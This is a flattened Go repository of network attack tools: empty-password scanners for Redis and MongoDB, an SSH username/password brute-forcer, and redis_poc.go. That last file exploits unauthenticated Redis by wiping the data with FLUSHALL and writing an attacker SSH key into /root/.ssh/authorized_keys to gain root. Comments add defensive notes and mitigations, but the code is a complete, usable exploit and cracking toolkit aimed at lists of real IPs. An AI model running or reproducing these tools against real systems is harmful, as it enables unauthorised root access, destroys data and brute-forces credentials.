├── .gitattributes ├── .gitignore ├── README.md ├── redis_poc.go ├── scan_mongodb.go ├── scan_redis.go └── scan_ssh.go /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Windows image file caches 2 | Thumbs.db 3 | ehthumbs.db 4 | 5 | # Folder config file 6 | Desktop.ini 7 | 8 | # Recycle Bin used on file shares 9 | $RECYCLE.BIN/ 10 | 11 | # Windows Installer files 12 | *.cab 13 | *.msi 14 | *.msm 15 | *.msp 16 | 17 | # Windows shortcuts 18 | *.lnk 19 | 20 | # ========================= 21 | # Operating System Files 22 | # ========================= 23 | 24 | # OSX 25 | # ========================= 26 | 27 | .DS_Store 28 | .AppleDouble 29 | .LSOverride 30 | 31 | # Thumbnails 32 | ._* 33 | 34 | # Files that might appear on external disk 35 | .Spotlight-V100 36 | .Trashes 37 | 38 | # Directories potentially created on remote AFP share 39 | .AppleDB 40 | .AppleDesktop 41 | Network Trash Folder 42 | Temporary Items 43 | .apdisk 44 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 说明 2 | 1. scan_ssh.go为ssh口令扫描器,iplist中的内容格式为ip:port 3 | 1. scan_redis为redis空口令扫描器,iplist中的内容格式为ip:port 4 | 1. scan_mongodb为mongodb空口令扫描器,iplist中的内容格式为ip:port 5 | 1. 
redis_poc为redis弱口令get root利用工具,iplist中的内容格式为ip:port 6 | 7 | ## 注: 8 | 请大家不用关注这个项目了,直接看这个吧,[https://github.com/netxfly/x-crack](https://github.com/netxfly/x-crack) 9 |
--------------------------------------------------------------------------------
/redis_poc.go:
--------------------------------------------------------------------------------
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"gopkg.in/redis.v3"
	"log"
	"os"
	"runtime"
	"strings"
	"time"
)

// rsa_key is the value TestConnect stores under the Redis key "xsec".
// As written it is a placeholder, not a real key: the Chinese text in the
// literal says to substitute the output of `cat ~/.ssh/id_rsa.pub`
// (generated with `ssh-keygen -t rsa`).
const rsa_key = "\n\ncat ~/.ssh/id_rsa.pub的内容,自己用ssh-keygen -t rsa生成下即可\n\n"

// HostInfo carries one target and the outcome of probing it.
type HostInfo struct {
	host   string // address part of an "ip:port" input line
	port   string // port part of an "ip:port" input line
	reply  string // string form of the last CONFIG SET dbfilename result
	is_vul bool   // true when PING with an empty password succeeded
}

// Usage prints the banner and the expected command line (one argument: the
// path of a file with one "ip:port" entry per line).
func Usage(cmd string) {
	fmt.Println(strings.Repeat("-", 50))
	fmt.Println("Redis weak password poc by netxfly")
	fmt.Println("Usage:")
	fmt.Printf("%s iplist \n", cmd)
	fmt.Println(strings.Repeat("-", 50))
}

// main prints the banner in both branches; with exactly one argument it then
// reads the target list and runs Scan over it.
func main() {
	runtime.GOMAXPROCS(runtime.NumCPU())

	if len(os.Args) != 2 {
		Usage(os.Args[0])
	} else {
		Usage(os.Args[0])
		iplist := os.Args[1]
		Scan(Prepare(iplist))
	}
}

// Prepare returns the lines of the file named by iplist, one slice element
// per line. The error from os.Open is discarded and scanner.Err() is not
// checked, so an unreadable file is not reported to the caller.
func Prepare(iplist string) (slice_iplist []string) {
	iplistFile, _ := os.Open(iplist)
	defer iplistFile.Close()
	scanner := bufio.NewScanner(iplistFile)
	scanner.Split(bufio.ScanLines)
	for scanner.Scan() {
		slice_iplist = append(slice_iplist, scanner.Text())
	}

	return slice_iplist
}

// TestConnect probes one Redis endpoint with an empty password and, when PING
// succeeds, issues a fixed command sequence against it, then sends the updated
// HostInfo on chan_result.
//
// What the sequence does to the server, in order:
//   - CONFIG SET dbfilename xsec.rdb, SAVE: writes a snapshot named xsec.rdb
//     into whatever directory the server currently uses.
//   - FLUSHALL: removes the server's existing data. This is destructive.
//   - SET xsec <rsa_key>: stores the key material as the only value.
//   - CONFIG SET dir /root/.ssh/, CONFIG SET dbfilename authorized_keys, SAVE:
//     makes the server write its dump file to /root/.ssh/authorized_keys.
//
// The last step only has an effect where the Redis process is able to write
// to /root/.ssh/, which in practice means it runs with root privileges.
// Nothing here restores dir or dbfilename, so the server is left configured
// to dump into authorized_keys; later snapshots would presumably land there
// as well.
//
// Defensive reading: the whole chain depends on an unauthenticated client
// being allowed to run CONFIG and SAVE. Requiring authentication
// (requirepass or ACLs), keeping the port off untrusted networks (bind,
// protected-mode, firewalling), running Redis as an unprivileged user and
// restricting CONFIG (rename-command or ACL rules) each break it. Artifacts
// visible in this code that are useful when investigating a host: a key named
// "xsec", a file named "xsec.rdb" in the former data directory, `dir` set to
// /root/.ssh/, `dbfilename` set to authorized_keys, and an authorized_keys
// file with Redis dump content around a public key.
//
// is_vul is set as soon as PING succeeds; the results of the later commands
// are only logged, and the return value of SET is ignored. The client is not
// closed in this function.
func TestConnect(host_info HostInfo, chan_result chan HostInfo) {
	host := host_info.host
	port := host_info.port
	reply := host_info.reply
	is_vul := false

	// Command results are collected in a buffer and printed in one piece
	// after the sequence has run.
	var buf bytes.Buffer
	logger := log.New(&buf, "logger: ", log.Ldate)

	client := redis.NewClient(&redis.Options{
		Addr:     host + ":" + port,
		Password: "", // no password set
		DB:       0,  // use default DB
	})

	_, err := client.Ping().Result()
	if err == nil {
		is_vul = true

		// Snapshot under a new name, then wipe the data set.
		logger.Println(client.ConfigSet("dbfilename", "xsec.rdb").String())
		logger.Println(client.Save().String())
		logger.Println(client.FlushAll().String())

		// Store the key material and redirect the dump file.
		client.Set("xsec", rsa_key, 0)
		logger.Println(client.ConfigSet("dir", "/root/.ssh/").String())
		logger.Println(client.ConfigGet("dir").String())
		reply = client.ConfigSet("dbfilename", "authorized_keys").String()
		logger.Println(reply)
		logger.Println(client.Save().String())
		fmt.Println(&buf)
	}

	host_info.is_vul = is_vul
	host_info.reply = reply
	chan_result <- host_info

}

// Scan starts one TestConnect goroutine per "ip:port" line and prints the
// targets whose is_vul flag came back true.
//
// Each line is split on ":" and indexed at [0] and [1] without a length
// check, so a line without a colon panics with an index-out-of-range error.
func Scan(slice_iplist []string) {
	n := len(slice_iplist)
	chan_scan_result := make(chan HostInfo, n)
	done := make(chan bool, n)

	for _, host_port := range slice_iplist {
		// fmt.Printf("Try to connect %s\n", host_port)
		t := strings.Split(host_port, ":")
		host := t[0]
		port := t[1]
		host_info := HostInfo{host, port, "", false}

		go TestConnect(host_info, chan_scan_result)
		// Crude concurrency cap: poll until the process-wide goroutine
		// count drops below NumCPU*200 before starting the next probe.
		for runtime.NumGoroutine() > runtime.NumCPU()*200 {
			time.Sleep(10 * time.Microsecond)
		}

	}

	// Collector: one iteration per input line, each waiting up to 60 seconds
	// for a result. done is signalled on every iteration, result or timeout.
	go func() {
		for i := 0; i < cap(chan_scan_result); i++ {
			select {
			case r := <-chan_scan_result:
				if r.is_vul {
					fmt.Printf("%s:%s is vulnerability, get root's reply: %s\n", r.host, r.port, r.reply)
				}
			case <-time.After(60 * time.Second):
				fmt.Println("timeout")
				// break leaves the select only, not the for loop.
				break

			}
			done <- true

		}
	}()

	// Block until the collector has signalled once per input line.
	for i := 0; i < cap(done); i++ {
		<-done
	}

}
--------------------------------------------------------------------------------
/scan_mongodb.go:
--------------------------------------------------------------------------------
package main

import (
	"bufio"
	"fmt"
	"github.com/MG-RAST/golib/mgo"
	"os"
	"runtime"
	"strings"
	"time"
)

// HostInfo carries one MongoDB target and the outcome of probing it.
type HostInfo struct {
	Host    string   // address part of an "ip:port" input line
	Port    string   // port part of an "ip:port" input line
	Dbs     []string // database names returned by the server, if any
	Is_weak bool     // true when the database list could be read without credentials
}

// Usage prints the banner and the expected command line. The banner text says
// "Redis Scanner" although this file probes MongoDB; the string is left as in
// the original.
func Usage(cmd string) {
	fmt.Println(strings.Repeat("-", 50))
	fmt.Println("Redis Scanner by hartnett x@xsec.io")
	fmt.Println("Usage:")
	fmt.Printf("%s iplist \n", cmd)
	fmt.Println(strings.Repeat("-", 50))
}

// Prepare returns the lines of the file named by iplist, one slice element
// per line. The error from os.Open is discarded and scanner.Err() is not
// checked, so an unreadable file is not reported to the caller.
func Prepare(iplist string) (slice_iplist []string) {
	iplistFile, _ := os.Open(iplist)
	defer iplistFile.Close()
	scanner := bufio.NewScanner(iplistFile)
	scanner.Split(bufio.ScanLines)
	for scanner.Scan() {
		slice_iplist = append(slice_iplist, scanner.Text())
	}

	return slice_iplist
}

// main prints the banner in both branches; with exactly one argument it then
// reads the target list and runs Scan over it.
func main() {
	runtime.GOMAXPROCS(runtime.NumCPU())

	if len(os.Args) != 2 {
		Usage(os.Args[0])
	} else {
		Usage(os.Args[0])
		iplist := os.Args[1]
		Scan(Prepare(iplist))
	}
}

// TestConnect dials one MongoDB endpoint with a 2 second timeout and no
// credentials, asks for the list of database names, and sends the updated
// HostInfo on chan_host_info. Is_weak is set only when both the dial and the
// listing succeed. The session is not closed in this function.
//
// Defensive reading: a server that returns its database list here is
// accepting unauthenticated clients from the scanning network. Enabling
// access control (security.authorization in mongod.conf) and limiting the
// listening interfaces (net.bindIp) or firewalling the port make this probe
// come back negative.
func TestConnect(host_info HostInfo, chan_host_info chan HostInfo) {
	host := host_info.Host
	port := host_info.Port
	is_weak := host_info.Is_weak
	url := fmt.Sprintf("%s:%s", host, port)
	session, err := mgo.DialWithTimeout(url, 2*time.Second)
	if err == nil {
		dbs, err := session.DatabaseNames()
		if err == nil {
			is_weak = true
			host_info.Dbs = dbs
		}
	}
	host_info.Is_weak = is_weak
	chan_host_info <- host_info
}

// Scan starts one TestConnect goroutine per "ip:port" line and prints the
// targets whose Is_weak flag came back true, together with their database
// names.
//
// Each line is split on ":" and indexed at [0] and [1] without a length
// check, so a line without a colon panics with an index-out-of-range error.
func Scan(slice_iplist []string) {
	n := len(slice_iplist)
	chan_scan_result := make(chan HostInfo, n)
	done := make(chan bool, n)

	for _, host_port := range slice_iplist {
		// fmt.Printf("Try to connect %s\n", host_port)
		t := strings.Split(host_port, ":")
		host := t[0]
		port := t[1]
		host_info := HostInfo{host, port, []string{}, false}

		go TestConnect(host_info, chan_scan_result)
		// Crude concurrency cap: poll until the process-wide goroutine
		// count drops below NumCPU*200 before starting the next probe.
		for runtime.NumGoroutine() > runtime.NumCPU()*200 {
			time.Sleep(10 * time.Microsecond)
		}

	}

	// Collector: one iteration per input line, each waiting up to 3 seconds
	// for a result. done is signalled on every iteration, result or timeout.
	go func() {
		for i := 0; i < cap(chan_scan_result); i++ {
			select {
			case r := <-chan_scan_result:
				if r.Is_weak {
					fmt.Printf("%s:%s is vulnerability, DBs:%s\n", r.Host, r.Port, r.Dbs)
				}
			case <-time.After(3 * time.Second):
				// fmt.Println("timeout")
				// break leaves the select only, not the for loop.
				break

			}
			done <- true

		}
	}()

	// Block until the collector has signalled once per input line.
	for i := 0; i < cap(done); i++ {
		<-done
	}

}
--------------------------------------------------------------------------------
/scan_redis.go:
--------------------------------------------------------------------------------
package main

import (
	"bufio"
	"fmt"
	"github.com/beego/redigo/redis"
	"os"
	"runtime"
	"strings"
	"time"
)

// HostInfo carries one Redis target and the outcome of probing it.
type HostInfo struct {
	host   string // address part of an "ip:port" input line
	port   string // port part of an "ip:port" input line
	reply  string // the server's reply to PING, when one was received
	is_vul bool   // true when PING was answered without authenticating
}

// Usage prints the banner and the expected command line (one argument: the
// path of a file with one "ip:port" entry per line).
func Usage(cmd string) {
	fmt.Println(strings.Repeat("-", 50))
	fmt.Println("Redis Scanner by hartnett x@xsec.io")
	fmt.Println("Usage:")
	fmt.Printf("%s iplist \n", cmd)
	fmt.Println(strings.Repeat("-", 50))
}

// main prints the banner in both branches; with exactly one argument it then
// reads the target list and runs Scan over it.
func main() {
	runtime.GOMAXPROCS(runtime.NumCPU())

	if len(os.Args) != 2 {
		Usage(os.Args[0])
	} else {
		Usage(os.Args[0])
		iplist := os.Args[1]
		Scan(Prepare(iplist))
	}
}

// Prepare returns the lines of the file named by iplist, one slice element
// per line. The error from os.Open is discarded and scanner.Err() is not
// checked, so an unreadable file is not reported to the caller.
func Prepare(iplist string) (slice_iplist []string) {
	iplistFile, _ := os.Open(iplist)
	defer iplistFile.Close()
	scanner := bufio.NewScanner(iplistFile)
	scanner.Split(bufio.ScanLines)
	for scanner.Scan() {
		slice_iplist = append(slice_iplist, scanner.Text())
	}

	return slice_iplist
}

// TestConnect opens a TCP connection to one Redis endpoint, sends PING without
// authenticating, and sends the updated HostInfo on chan_result. is_vul is set
// when the reply converts to a string without error; unlike redis_poc.go this
// probe issues no other command. The connection is not closed in this
// function, and Dial is called without a timeout (the DialTimeout variant is
// commented out).
//
// Defensive reading: a server that enforces authentication is expected to
// answer an unauthenticated PING with an error, which redis.String surfaces
// as err, so requirepass/ACLs, bind, protected-mode or a firewall rule on the
// port make this probe come back negative.
func TestConnect(host_info HostInfo, chan_result chan HostInfo) {
	host := host_info.host
	port := host_info.port
	reply := host_info.reply
	is_vul := false
	c, err := redis.Dial("tcp", host+":"+port)
	// _, err := redis.DialTimeout("tcp", host+":"+port, 2*time.Second, 2*time.Second, 2*time.Second)
	if err == nil {
		s, err := redis.String(c.Do("ping"))
		if err == nil {
			is_vul = true
			reply = s
		}
	}

	host_info.is_vul = is_vul
	host_info.reply = reply
	chan_result <- host_info

}

// Scan starts one TestConnect goroutine per "ip:port" line and prints the
// targets whose is_vul flag came back true, together with the PING reply.
//
// Each line is split on ":" and indexed at [0] and [1] without a length
// check, so a line without a colon panics with an index-out-of-range error.
func Scan(slice_iplist []string) {
	n := len(slice_iplist)
	chan_scan_result := make(chan HostInfo, n)
	done := make(chan bool, n)

	for _, host_port := range slice_iplist {
		// fmt.Printf("Try to connect %s\n", host_port)
		t := strings.Split(host_port, ":")
		host := t[0]
		port := t[1]
		host_info := HostInfo{host, port, "", false}

		go TestConnect(host_info, chan_scan_result)
		// Crude concurrency cap: poll until the process-wide goroutine
		// count drops below NumCPU*200 before starting the next probe.
		for runtime.NumGoroutine() > runtime.NumCPU()*200 {
			time.Sleep(10 * time.Microsecond)
		}

	}

	// Collector: one iteration per input line, each waiting up to 3 seconds
	// for a result. done is signalled on every iteration, result or timeout.
	go func() {
		for i := 0; i < cap(chan_scan_result); i++ {
			select {
			case r := <-chan_scan_result:
				if r.is_vul {
					fmt.Printf("%s:%s is vulnerability, ping's reply: %s\n", r.host, r.port, r.reply)
				}
			case <-time.After(3 * time.Second):
				// fmt.Println("timeout")
				// break leaves the select only, not the for loop.
				break

			}
			done <- true

		}
	}()

	// Block until the collector has signalled once per input line.
	for i := 0; i < cap(done); i++ {
		<-done
	}

}
--------------------------------------------------------------------------------
/scan_ssh.go:
--------------------------------------------------------------------------------
package main
import (
	"bufio"
	"bytes"
	"fmt"
	"github.com/btcsuite/golangcrypto/ssh"
	"log"
	"os"
	"runtime"
	"strings"
	"time"
)

// HostInfo carries one (target, user, password) combination and whether the
// SSH server accepted it.
type HostInfo struct {
	host    string // address part of an "ip:port" input line
	port    string // port part of an "ip:port" input line
	user    string // user name taken from the user dictionary
	pass    string // password taken from the password dictionary
	is_weak bool   // true when login and session creation both succeeded
}

// Usage prints the banner and the expected command line (three arguments:
// target list, user dictionary, password dictionary).
func Usage(cmd string) {
	fmt.Println(strings.Repeat("-", 50))
	fmt.Println("SSH Scanner by hartnett ")
	fmt.Println("Usage:")
	fmt.Printf("%s iplist userdic passdic\n", cmd)
	fmt.Println(strings.Repeat("-", 50))
}

// Prepare reads the three input files line by line and returns their contents
// as slices: targets, user names, passwords. The errors from os.Open are
// discarded and no scanner's Err() is checked, so an unreadable file is not
// reported to the caller.
func Prepare(iplist, user_dict, pass_dict string) (slice_iplist, slice_user, slice_pass []string) {
	iplistFile, _ := os.Open(iplist)
	defer iplistFile.Close()
	scanner := bufio.NewScanner(iplistFile)
	scanner.Split(bufio.ScanLines)
	for scanner.Scan() {
		slice_iplist = append(slice_iplist, scanner.Text())
	}

	user_dictFile, _ := os.Open(user_dict)
	defer user_dictFile.Close()
	scanner_u := bufio.NewScanner(user_dictFile)
	scanner_u.Split(bufio.ScanLines)
	for scanner_u.Scan() {
		slice_user = append(slice_user, scanner_u.Text())
	}

	pass_dictFile, _ := os.Open(pass_dict)
	defer pass_dictFile.Close()
	scanner_p := bufio.NewScanner(pass_dictFile)
	scanner_p.Split(bufio.ScanLines)
	for scanner_p.Scan() {
		slice_pass = append(slice_pass, scanner_p.Text())
	}

	return slice_iplist, slice_user, slice_pass
}

// Scan handles the targets one after another. For each target it starts one
// Crack goroutine per user/password pair (len(slice_user)*len(slice_pass)
// attempts) and prints the results as they arrive.
//
// Each target line is split on ":" and indexed at [0] and [1] without a
// length check, so a line without a colon panics with an index-out-of-range
// error.
//
// Defensive reading: from the server's side this is a burst of password
// authentication attempts from one source, cycling through many user names.
// It shows up as repeated failures in the SSH authentication log and is
// neutralised by disabling password logins (PasswordAuthentication no) in
// favour of keys; MaxAuthTries, PermitRootLogin restrictions and
// source-based rate limiting reduce what such a run can achieve.
func Scan(slice_iplist, slice_user, slice_pass []string) {
	for _, host_port := range slice_iplist {
		fmt.Printf("Try to crack %s\n", host_port)
		t := strings.Split(host_port, ":")
		host := t[0]
		port := t[1]
		n := len(slice_user) * len(slice_pass)
		chan_scan_result := make(chan HostInfo, n)

		for _, user := range slice_user {
			for _, passwd := range slice_pass {

				host_info := HostInfo{}
				host_info.host = host
				host_info.port = port
				host_info.user = user
				host_info.pass = passwd
				host_info.is_weak = false

				go Crack(host_info, chan_scan_result)
				// Crude concurrency cap: poll until the process-wide
				// goroutine count drops below NumCPU*300.
				for runtime.NumGoroutine() > runtime.NumCPU()*300 {
					time.Sleep(10 * time.Microsecond)
				}
			}
		}
		done := make(chan bool, n)
		// Collector: one iteration per attempted pair, each waiting up to
		// 1 second for a result. Every received HostInfo is printed,
		// including the password that was tried; accepted pairs are printed
		// a second time through a logger. done is signalled on every
		// iteration, result or timeout.
		go func() {
			for i := 0; i < cap(chan_scan_result); i++ {
				select {
				case r := <-chan_scan_result:
					fmt.Println(r)
					if r.is_weak {
						var buf bytes.Buffer
						logger := log.New(&buf, "logger: ", log.Ldate)
						logger.Printf("%s:%s, user: %s, password: %s\n", r.host, r.port, r.user, r.pass)
						fmt.Print(&buf)
					}
				case <-time.After(1 * time.Second):
					// fmt.Println("timeout")
					// break leaves the select only, not the for loop.
					break

				}
				done <- true

			}
		}()

		// Block until the collector has signalled once per attempted pair
		// before moving on to the next target.
		for i := 0; i < cap(done); i++ {
			// fmt.Println(<-done)
			<-done
		}

	}

}

// Crack tries one user/password pair against one SSH endpoint and sends the
// updated HostInfo on chan_scan_result. is_weak is true only when ssh.Dial
// succeeds with password authentication and a session can then be opened.
// The client returned by ssh.Dial is not closed in this function.
func Crack(host_info HostInfo, chan_scan_result chan HostInfo) {
	host := host_info.host
	port := host_info.port
	user := host_info.user
	passwd := host_info.pass
	is_ok := host_info.is_weak

	config := &ssh.ClientConfig{
		User: user,
		Auth: []ssh.AuthMethod{
			ssh.Password(passwd),
		},
	}
	client, err := ssh.Dial("tcp", host+":"+port, config)
	if err != nil {
		is_ok = false
		// panic("Failed to dial: " + err.Error())
	} else {
		session, err := client.NewSession()
		// The Close is deferred before err is inspected.
		defer session.Close()

		if err != nil {
			is_ok = false
		} else {
			is_ok = true

		}

	}

	host_info.is_weak = is_ok
	chan_scan_result <- host_info
}

// main prints the banner in both branches; with exactly three arguments it
// then loads the target list and both dictionaries and runs Scan over them.
func main() {
	runtime.GOMAXPROCS(runtime.NumCPU())

	if len(os.Args) != 4 {
		Usage(os.Args[0])
	} else {
		Usage(os.Args[0])
		iplist := os.Args[1]
		user_dict := os.Args[2]
		pass_dict := os.Args[3]
		Scan(Prepare(iplist, user_dict, pass_dict))
	}
}

--------------------------------------------------------------------------------